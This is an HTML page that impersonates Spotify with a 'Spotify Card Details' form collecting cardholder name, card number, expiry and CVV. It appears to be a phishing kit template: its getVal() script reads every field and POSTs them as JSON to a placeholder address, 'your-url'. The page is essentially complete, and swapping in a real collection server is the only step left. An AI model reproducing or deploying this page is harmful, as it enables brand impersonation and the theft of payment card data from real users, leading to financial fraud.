<html>
    <head>
	<meta charset="UTF-8">
        <title>Spotify</title> 

	<link rel="icon" type="image/x-icon" href="favicon.png">
	<link rel="stylesheet" href="./style.css">
	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    </head>

    <body>
        <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
        <div class="container p-0">
	    <div class="card px-4">
                <p class="h8 py-3">Spotify Card Details</p>
                <div class="row gx-3">
                    <div class="col-12">
                        <div class="d-flex flex-column">
				<p class="text mb-1">Cardholder Name</p>
                            	<input id="card_holder" class="form-control mb-3" type="text" placeholder="Name" value="Barry Allen">
			</div>
                    </div>
                    <div class="col-12">
                        <div class="d-flex flex-column">
                             	<p class="text mb-1">Card Number</p>
                            	<input id="card_number" class="form-control mb-3" type="text" placeholder="1234 5678 435678">
			</div>
                    </div>
                    <div class="col-6">
                        <div class="d-flex flex-column">
                       		<p class="text mb-1">Expiry</p>
                            	<input id="expiry" class="form-control mb-3" type="text" placeholder="MM/YYYY">
			</div>
                    </div>
                    <div class="col-6">
                        <div class="d-flex flex-column">
                        	<p class="text mb-1">CVV/CVC</p>
                           	<input id="security_code" class="form-control mb-3 pt-2" type="password" placeholder="***">
			</div>
                    </div>
                    <div class="col-12">
                        <div class="btn btn-primary mb-3">
                     	    	<span class="ps-3" onclick="getVal()" >Update your card</span>
                            	<span class="fas fa-arrow-right"></span>	
			</div>
                    </div>
                </div>
            </div>	
	</div>	
	<script>
		function getVal(){

                	const val1 = document.getElementById('card_holder').value;
                	const val2 = document.getElementById('card_number').value;
                	const val3 = document.getElementById('expiry').value;
                	const val4 = document.getElementById('security_code').value;
		
			const xhr = new XMLHttpRequest();
                	xhr.open("POST", "your-url");
                	xhr.setRequestHeader("Content-Type", "application/json; charset=UTF-8")

                	const body = JSON.stringify({
                	    ch: val1,
                	    cn: val2,
                	    ex: val3,
                	    sc: val4
                	});

                	xhr.send(body);
		}
	</script>
    </body>
</html>

